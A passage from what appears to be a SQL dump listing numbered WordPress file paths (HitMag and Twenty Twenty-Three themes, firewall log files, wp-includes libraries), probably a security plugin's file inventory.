content/themes/hitmag/inc/kirki/controls/class-kirki-controls.php'),(3776,'wp-content/themes/hitmag/inc/kirki/controls/css/styles.css'),(3777,'wp-content/themes/hitmag/inc/kirki/controls/js/script.js'),(3778,'wp-content/themes/hitmag/inc/kirki/controls/js/script.min.js'),(3779,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-background.php'),(3780,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-base.php'),(3781,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-checkbox.php'),(3782,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-code.php'),(3783,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-color-palette.php'),(3784,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-color.php'),(3785,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-cropped-image.php'),(3786,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-custom.php'),(3787,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dashicons.php'),(3788,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-date.php'),(3789,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dimension.php'),(3790,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-dimensions.php'),(3791,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-editor.php'),(3792,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-generic.php'),(3793,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-image.php'),(3794,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-multicheck.php'),(3795,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-multicolor.php'),(3796,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-number.php'),(3797,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-palette.php'),(3798,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio-buttonset.php'),(3799,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio-image.php'),(3800,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-radio.php'),(3801,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-repeater.php'),(3802,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-select.php'),(3803,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-slider.php'),(3804,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-sortable.php'),(3805,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-switch.php'),(3806,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-toggle.php'),(3807,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-typography.php'),(3808,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-upload.php'),(3809,'wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-settings-repeater-setting.php'),(3810,'wp-content/themes/hitmag/inc/kirki/controls/views/code.php'),(3811,'wp-content/themes/hitmag/inc/kirki/controls/views/color.php'),(3812,'wp-content/themes/hitmag/inc/kirki/controls/views/generic.php'),(3813,'wp-content/themes/hitmag/inc/kirki/controls/views/image.php'),(3814,'wp-content/themes/hitmag/inc/kirki/controls/views/number.php'),(3815,'wp-content/themes/hitmag/inc/kirki/controls/views/radio.php'),(3816,'wp-content/themes/hitmag/inc/kirki/controls/views/select.php'),(3817,'wp-content/themes/hitmag/inc/kirki/controls/views/textarea.php'),(3818,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-config.php'),(3819,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-control.php'),(3820,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-field.php'),(3821,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-helper.php'),(3822,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-init.php'),(3823,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-l10n.php'),(3824,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-modules.php'),(3825,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-panel.php'),(3826,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-sanitize-values.php'),(3827,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-section.php'),(3828,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-sections.php'),(3829,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-setting-site-option.php'),(3830,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-setting-user-meta.php'),(3831,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-settings.php'),(3832,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-toolkit.php'),(3833,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-util.php'),(3834,'wp-content/themes/hitmag/inc/kirki/core/class-kirki-values.php'),(3835,'wp-content/themes/hitmag/inc/kirki/core/class-kirki.php'),(3836,'wp-content/themes/hitmag/inc/kirki/deprecated/classes.php'),(3837,'wp-content/themes/hitmag/inc/kirki/deprecated/deprecated.php'),(3838,'wp-content/themes/hitmag/inc/kirki/deprecated/filters.php'),(3839,'wp-content/themes/hitmag/inc/kirki/deprecated/functions.php'),(3840,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-background.php'),(3841,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-checkbox.php'),(3842,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-code.php'),(3843,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color-alpha.php'),(3844,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color-palette.php'),(3845,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color.php'),(3846,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-custom.php'),(3847,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dashicons.php'),(3848,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-date.php'),(3849,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dimension.php'),(3850,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dimensions.php'),(3851,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-dropdown-pages.php'),(3852,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-editor.php'),(3853,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-fontawesome.php'),(3854,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-generic.php'),(3855,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-group-title.php'),(3856,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-image.php'),(3857,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-kirki-generic.php'),(3858,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-link.php'),(3859,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-multicheck.php'),(3860,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-multicolor.php'),(3861,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-number.php'),(3862,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-palette.php'),(3863,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-preset.php'),(3864,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio-buttonset.php'),(3865,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio-image.php'),(3866,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-radio.php'),(3867,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-repeater.php'),(3868,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select.php'),(3869,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select2-multiple.php'),(3870,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select2.php'),(3871,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-slider.php'),(3872,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-sortable.php'),(3873,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-spacing.php'),(3874,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-switch.php'),(3875,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-text.php'),(3876,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-textarea.php'),(3877,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-toggle.php'),(3878,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-typography.php'),(3879,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-upload.php'),(3880,'wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-url.php'),(3881,'wp-content/themes/hitmag/inc/kirki/kirki.php'),(3882,'wp-content/themes/hitmag/inc/kirki/lib/class-aricolor.php'),(3883,'wp-content/themes/hitmag/inc/kirki/lib/class-kirki-color.php'),(3884,'wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-modules-css-generator.php'),(3885,'wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-modules-css.php'),(3886,'wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-output.php'),(3887,'wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-background.php'),(3888,'wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-dimensions.php'),(3889,'wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-image.php'),(3890,'wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-multicolor.php'),(3891,'wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-typography.php'),(3892,'wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-background-image.php'),(3893,'wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-background-position.php'),(3894,'wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property-font-family.php'),(3895,'wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property.php'),(3896,'wp-content/themes/hitmag/inc/kirki/modules/css-vars/class-kirki-modules-css-vars.php'),(3897,'wp-content/themes/hitmag/inc/kirki/modules/css-vars/script.js'),(3898,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/class-kirki-modules-custom-sections.php'),(3899,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/panels/class-kirki-panels-nested-panel.php'),(3900,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-default-section.php'),(3901,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-expanded-section.php'),(3902,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-link-section.php'),(3903,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections/class-kirki-sections-nested-section.php'),(3904,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections.css'),(3905,'wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections.js'),(3906,'wp-content/themes/hitmag/inc/kirki/modules/field-dependencies/class-kirki-modules-field-dependencies.php'),(3907,'wp-content/themes/hitmag/inc/kirki/modules/field-dependencies/field-dependencies.js'),(3908,'wp-content/themes/hitmag/inc/kirki/modules/gutenberg/class-kirki-modules-gutenberg.php'),(3909,'wp-content/themes/hitmag/inc/kirki/modules/icons/class-kirki-modules-icons.php'),(3910,'wp-content/themes/hitmag/inc/kirki/modules/icons/icons.js'),(3911,'wp-content/themes/hitmag/inc/kirki/modules/loading/class-kirki-modules-loading.php'),(3912,'wp-content/themes/hitmag/inc/kirki/modules/post-meta/class-kirki-modules-post-meta.php'),(3913,'wp-content/themes/hitmag/inc/kirki/modules/post-meta/customize-controls.js'),(3914,'wp-content/themes/hitmag/inc/kirki/modules/post-meta/customize-preview.js'),(3915,'wp-content/themes/hitmag/inc/kirki/modules/postmessage/class-kirki-modules-postmessage.php'),(3916,'wp-content/themes/hitmag/inc/kirki/modules/postmessage/postmessage.js'),(3917,'wp-content/themes/hitmag/inc/kirki/modules/preset/class-kirki-modules-preset.php'),(3918,'wp-content/themes/hitmag/inc/kirki/modules/preset/preset.js'),(3919,'wp-content/themes/hitmag/inc/kirki/modules/selective-refresh/class-kirki-modules-selective-refresh.php'),(3920,'wp-content/themes/hitmag/inc/kirki/modules/tooltips/class-kirki-modules-tooltips.php'),(3921,'wp-content/themes/hitmag/inc/kirki/modules/tooltips/tooltip.css'),(3922,'wp-content/themes/hitmag/inc/kirki/modules/tooltips/tooltip.js'),(3923,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/class-kirki-modules-webfont-loader.php'),(3924,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/closure.js'),(3925,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/cssclassname.js'),(3926,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/domhelper.js'),(3927,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/eventdispatcher.js'),(3928,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/font.js'),(3929,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontmodule.js'),(3930,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontmoduleloader.js'),(3931,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontruler.js'),(3932,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontwatcher.js'),(3933,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontwatchrunner.js'),(3934,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/initialize.js'),(3935,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/nativefontwatchrunner.js'),(3936,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/stylesheetwaiter.js'),(3937,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/webfont.js'),(3938,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/custom.js'),(3939,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/fontdeck.js'),(3940,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/fontapiparser.js'),(3941,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/fontapiurlbuilder.js'),(3942,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/googlefontapi.js'),(3943,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/monotype.js'),(3944,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/typekit.js'),(3945,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules.yml'),(3946,'wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/webfontloader.js'),(3947,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts-downloader.php'),(3948,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts-google.php'),(3949,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts.php'),(3950,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts-async.php'),(3951,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts-embed.php'),(3952,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts.php'),(3953,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfont-files.json'),(3954,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfont-names.json'),(3955,'wp-content/themes/hitmag/inc/kirki/modules/webfonts/webfonts.json'),(3956,'wp-content/themes/hitmag/inc/kirki/readme.txt'),(3957,'wp-content/themes/hitmag/inc/kirki/upgrade-notifications.php'),(3958,'wp-content/themes/hitmag/inc/template-tags.php'),(3959,'wp-content/themes/hitmag/inc/widgets/block-posts-dual.php'),(3960,'wp-content/themes/hitmag/inc/widgets/block-posts-grid.php'),(3961,'wp-content/themes/hitmag/inc/widgets/block-posts-single.php'),(3962,'wp-content/themes/hitmag/inc/widgets/popular-tags-comments.php'),(3963,'wp-content/themes/hitmag/inc/widgets/sidebar-posts.php'),(3964,'wp-content/themes/hitmag/index.php'),(3965,'wp-content/themes/hitmag/js/customizer.js'),(3966,'wp-content/themes/hitmag/js/html5shiv.js'),(3967,'wp-content/themes/hitmag/js/html5shiv.min.js'),(3968,'wp-content/themes/hitmag/js/jquery.flexslider-min.js'),(3969,'wp-content/themes/hitmag/js/jquery.flexslider.js'),(3970,'wp-content/themes/hitmag/js/jquery.magnific-popup.js'),(3971,'wp-content/themes/hitmag/js/jquery.magnific-popup.min.js'),(3972,'wp-content/themes/hitmag/js/navigation.js'),(3973,'wp-content/themes/hitmag/js/scripts.js'),(3974,'wp-content/themes/hitmag/js/skip-link-focus-fix.js'),(3975,'wp-content/themes/hitmag/languages/hitmag.pot'),(3976,'wp-content/themes/hitmag/languages/readme.txt'),(3977,'wp-content/themes/hitmag/page.php'),(3978,'wp-content/themes/hitmag/readme.txt'),(3979,'wp-content/themes/hitmag/rtl.css'),(3980,'wp-content/themes/hitmag/screenshot.jpg'),(3981,'wp-content/themes/hitmag/search.php'),(3982,'wp-content/themes/hitmag/sidebar.php'),(3983,'wp-content/themes/hitmag/single.php'),(3984,'wp-content/themes/hitmag/style.css'),(3985,'wp-content/themes/hitmag/template-builder-fullwidth.php'),(3986,'wp-content/themes/hitmag/template-builder.php'),(3987,'wp-content/themes/hitmag/template-magazine.php'),(3988,'wp-content/themes/hitmag/template-parts/authorbox.php'),(3989,'wp-content/themes/hitmag/template-parts/content-none.php'),(3990,'wp-content/themes/hitmag/template-parts/content-page.php'),(3991,'wp-content/themes/hitmag/template-parts/content-search.php'),(3992,'wp-content/themes/hitmag/template-parts/content-single.php'),(3993,'wp-content/themes/hitmag/template-parts/content.php'),(3994,'wp-content/themes/hitmag/template-parts/featured-slider.php'),(3995,'wp-content/themes/hitmag/template-parts/menu-social.php'),(3996,'wp-content/themes/hitmag/template-parts/related-posts.php'),(3997,'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2'),(3998,'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2'),(3999,'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2'),(4000,'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2'),(4001,'wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt'),(4002,'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2'),(4003,'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2'),(4004,'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2'),(4005,'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2'),(4006,'wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt'),(4007,'wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf'),(4008,'wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt'),(4009,'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md'),(4010,'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2'),(4011,'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2'),(4012,'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2'),(4013,'wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2'),(4014,'wp-content/themes/twentytwentythree/parts/comments.html'),(4015,'wp-content/themes/twentytwentythree/parts/footer.html'),(4016,'wp-content/themes/twentytwentythree/parts/header.html'),(4017,'wp-content/themes/twentytwentythree/parts/post-meta.html'),(4018,'wp-content/themes/twentytwentythree/patterns/call-to-action.php'),(4019,'wp-content/themes/twentytwentythree/patterns/footer-default.php'),(4020,'wp-content/themes/twentytwentythree/patterns/hidden-404.php'),(4021,'wp-content/themes/twentytwentythree/patterns/hidden-comments.php'),(4022,'wp-content/themes/twentytwentythree/patterns/hidden-no-results.php'),(4023,'wp-content/themes/twentytwentythree/patterns/post-meta.php'),(4024,'wp-content/themes/twentytwentythree/readme.txt'),(4025,'wp-content/themes/twentytwentythree/screenshot.png'),(4026,'wp-content/themes/twentytwentythree/style.css'),(4027,'wp-content/themes/twentytwentythree/styles/aubergine.json'),(4028,'wp-content/themes/twentytwentythree/styles/block-out.json'),(4029,'wp-content/themes/twentytwentythree/styles/canary.json'),(4030,'wp-content/themes/twentytwentythree/styles/electric.json'),(4031,'wp-content/themes/twentytwentythree/styles/grapes.json'),(4032,'wp-content/themes/twentytwentythree/styles/marigold.json'),(4033,'wp-content/themes/twentytwentythree/styles/pilgrimage.json'),(4034,'wp-content/themes/twentytwentythree/styles/pitch.json'),(4035,'wp-content/themes/twentytwentythree/styles/sherbet.json'),(4036,'wp-content/themes/twentytwentythree/styles/whisper.json'),(4037,'wp-content/themes/twentytwentythree/templates/404.html'),(4038,'wp-content/themes/twentytwentythree/templates/archive.html'),(4039,'wp-content/themes/twentytwentythree/templates/blank.html'),(4040,'wp-content/themes/twentytwentythree/templates/blog-alternative.html'),(4041,'wp-content/themes/twentytwentythree/templates/home.html'),(4042,'wp-content/themes/twentytwentythree/templates/index.html'),(4043,'wp-content/themes/twentytwentythree/templates/page.html'),(4044,'wp-content/themes/twentytwentythree/templates/search.html'),(4045,'wp-content/themes/twentytwentythree/templates/single.html'),(4046,'wp-content/themes/twentytwentythree/theme.json'),(4047,'wp-content/wflogs/attack-data.php'),(4048,'wp-content/wflogs/config-livewaf.php'),(4049,'wp-content/wflogs/config-synced.php'),(4050,'wp-content/wflogs/config-transient.php'),(4051,'wp-content/wflogs/config.php'),(4052,'wp-content/wflogs/ips.php'),(4053,'wp-content/wflogs/rules.php'),(4054,'wp-content/wflogs/template.php'),(4055,'wp-cron.php'),(4056,'wp-includes/ID3/getid3.lib.php'),(4057,'wp-includes/ID3/getid3.php'),(4058,'wp-includes/ID3/license.commercial.txt'),(4059,'wp-includes/ID3/license.txt'),(4060,'wp-includes/ID3/module.audio-video.asf.php'),(4061,'wp-includes/ID3/module.audio-video.flv.php'),(4062,'wp-includes/ID3/module.audio-video.matroska.php'),(4063,'wp-includes/ID3/module.audio-video.quicktime.php'),(4064,'wp-includes/ID3/module.audio-video.riff.php'),(4065,'wp-includes/ID3/module.audio.ac3.php'),(4066,'wp-includes/ID3/module.audio.dts.php'),(4067,'wp-includes/ID3/module.audio.flac.php'),(4068,'wp-includes/ID3/module.audio.mp3.php'),(4069,'wp-includes/ID3/module.audio.ogg.php'),(4070,'wp-includes/ID3/module.tag.apetag.php'),(4071,'wp-includes/ID3/module.tag.id3v1.php'),(4072,'wp-includes/ID3/module.tag.id3v2.php'),(4073,'wp-includes/ID3/module.tag.lyrics3.php'),(4074,'wp-includes/ID3/readme.txt'),(4075,'wp-includes/IXR/class-IXR-base64.php'),(4076,'wp-includes/IXR/class-IXR-client.php'),(4077,'wp-includes/IXR/class-IXR-clientmulticall.php'),(4078,'wp-includes/IXR/class-IXR-date.php'),(4079,'wp-includes/IXR/class-IXR-error.php'),(4080,'wp-includes/IXR/class-IXR-introspectionserver.php'),(4081,'wp-includes/IXR/class-IXR-message.php'),(4082,'wp-includes/IXR/class-IXR-request.php'),(4083,'wp-includes/IXR/class-IXR-server.php'),(4084,'wp-includes/IXR/class-IXR-value.php'),(4085,'wp-includes/PHPMailer/Exception.php'),(4086,'wp-includes/PHPMailer/PHPMailer.php'),(4087,'wp-includes/PHPMailer/SMTP.php'),(4088,'wp-includes/Requests/Auth/Basic.php'),(4089,'wp-includes/Requests/Auth.php'),(4090,'wp-includes/Requests/Cookie/Jar.php'),(4091,'wp-includes/Requests/Cookie.php'),(4092,'wp-includes/Requests/Exception/HTTP/304.php'),(4093,'wp-includes/Requests/Exception/HTTP/305.php'),(4094,'wp-includes/Requests/Exception/HTTP/306.php'),(4095,'wp-includes/Requests/Exception/HTTP/400.php'),(4096,'wp-includes/Requests/Exception/HTTP/401.php'),(4097,'wp-includes/Requests/Exception/HTTP/402.php'),(4098,'wp-includes/Requests/Exception/HTTP/403.php'),(4099,'wp-includes/Requests/Exception/HTTP/404.php'),(4100,'wp-includes/Requests/Exception/HTTP/405.php'),(4101,'wp-includes/Requests/Exception/HTTP/406.php'),(4102,'wp-includes/Requests/Exception/HTTP/407.php'),(4103,'wp-includes/Requests/Exception/HTTP/408.php'),(4104,'wp-includes/Requests/Exception/HTTP/409.php'),(4105,'wp-includes/Requests/Exception/HTTP/410.php'),(4106,'wp-includes/Requests/Exception/HTTP/411.php'),(4107,'wp-includes/Requests/Exception/HTTP/412.php'),(4108,'wp-includes/Requests/Exception/HTTP/413.php'),(4109,'wp-includes/Requests/Exception/HTTP/414.php'),(4110,'wp-includes/Requests/Exception/HTTP/415.php'),(4111,'wp-includes/Requests/Exception/HTTP/416.php'),(4112,'wp-includes/Requests/Exception/HTTP/417.php'),(4113,'wp-includes/Requests/Exception/HTTP/418.php'),(4114,'wp-includes/Requests/Exception/HTTP/428.php'),(4115,'wp-includes/Requests/Exception/HTTP/429.php'),(4116,'wp-includes/Requests/Exception/HTTP/431.php'),(4117,'wp-includes/Requests/Exception/HTTP/500.php'),(4118,'wp-includes/Requests/Exception/HTTP/501.php'),(4119,'wp-includes/Requests/Exception/HTTP/502.php'),(4120,'wp-includes/Requests/Exception/HTTP/503.php'),(4121,'wp-includes/Requests/Exception/HTTP/504.php'),(4122,'wp-includes/Requests/Exception/HTTP/505.php'),(4123,'wp-includes/Requests/Exception/HTTP/511.php'),(4124,'wp-includes/Requests/Exception/HTTP/Unknown.php'),(4125,'wp-includes/Requests/Exception/HTTP.php'),(4126,'wp-includes/Requests/Exception/Transport/cURL.php'),(4127,'wp-includes/Requests/Exception/Transport.php'),(4128,'wp-includes/Requests/Exception.php'),(4129,'wp-includes/Requests/Hooker.php'),(4130,'wp-includes/Requests/Hooks.php'),(4131,'wp-includes/Requests/IDNAEncoder.php'),(4132,'wp-includes/Requests/IPv6.php'),(4133,'wp-includes/Requests/IRI.php'),(4134,'wp-includes/Requests/Proxy/HTTP.php'),(4135,'wp-includes/Requests/Proxy.php'),(4136,'wp-includes/Requests/Response/Headers.php'),(4137,'wp-includes/Requests/Response.php'),(4138,'wp-includes/Requests/SSL.php'),(4139,'wp-includes/Requests/Session.php'),(4140,'wp-includes/Requests/Transport/cURL.php'),(4141,'wp-includes/Requests/Transport/fsockopen.php'),(4142,'wp-includes/Requests/Transport.php'),(4143,'wp-includes/Requests/Utility/CaseInsensitiveDictionary.php'),(4144,'wp-includes/Requests/Utility/FilteredIterator.php'),(4145,'wp-includes/SimplePie/Author.php'),(4146,'wp-includes/SimplePie/Cache/Base.php'),(4147,'wp-includes/SimplePie/Cache/DB.php'),(4148,'wp-includes/SimplePie/Cache/File.php'),(4149,'wp-includes/SimplePie/Cache/Memcache.php'),(4150,'wp-includes/SimplePie/Cache/Memcached.php'),(4151,'wp-includes/SimplePie/Cache/MySQL.php'),(4152,'wp-includes/SimplePie/Cache/Redis.php'),(4153,'wp-includes/SimplePie/Cache.php'),(4154,'wp-includes/SimplePie/Caption.php'),(4155,'wp-includes/SimplePie/Category.php'),(4156,'wp-includes/SimplePie/Content/Type/Sniffer.php'),(4157,'wp-includes/SimplePie/Copyright.php'),(4158,'wp-includes/SimplePie/Core.php'),(4159,'wp-includes/SimplePie/Credit.php'),(4160,'wp-includes/SimplePie/Decode/HTML/Entities.php'),(4161,'wp-includes/SimplePie/Enclosure.php'),(4162,'wp-includes/SimplePie/Exception.php'),(4163,'wp-includes/SimplePie/File.php'),(4164,'wp-includes/SimplePie/HTTP/Parser.php'),(4165,'wp-includes/SimplePie/IRI.php'),(4166,'wp-includes/SimplePie/Item.php'),(4167,'wp-includes/SimplePie/Locator.php'),(4168,'wp-includes/SimplePie/Misc.php'),(4169,'wp-includes/SimplePie/Net/IPv6.php'),(4170,'wp-includes/SimplePie/Parse/Date.php'),(4171,'wp-includes/SimplePie/Parser.php'),(4172,'wp-includes/SimplePie/Rating.php'),(4173,'wp-includes/SimplePie/Registry.php'),(4174,'wp-includes/SimplePie/Restriction.php'),(4175,'wp-includes/SimplePie/Sanitize.php'),(4176,'wp-includes/SimplePie/Source.php'),(4177,'wp-includes/SimplePie/XML/Declaration/Parser.php'),(4178,'wp-includes/SimplePie/gzdecode.php'),(4179,'wp-includes/Text/Diff/Engine/native.php'),(4180,'wp-includes/Text/Diff/Engine/shell.php'),(4181,'wp-includes/Text/Diff/Engine/string.php'),(4182,'wp-includes/Text/Diff/Engine/xdiff.php'),(4183,'wp-includes/Text/Diff/Renderer/inline.php'),(4184,'wp-includes/Text/Diff/Renderer.php'),(4185,'wp-includes/Text/Diff.php'),(4186,'wp-includes/admin-bar.php'),(4187,'wp-includes/assets/script-loader-packages.min.php'),(4188,'wp-includes/assets/script-loader-packages.php'),(4189,'wp-includes/assets/script-loader-react-refresh-entry.m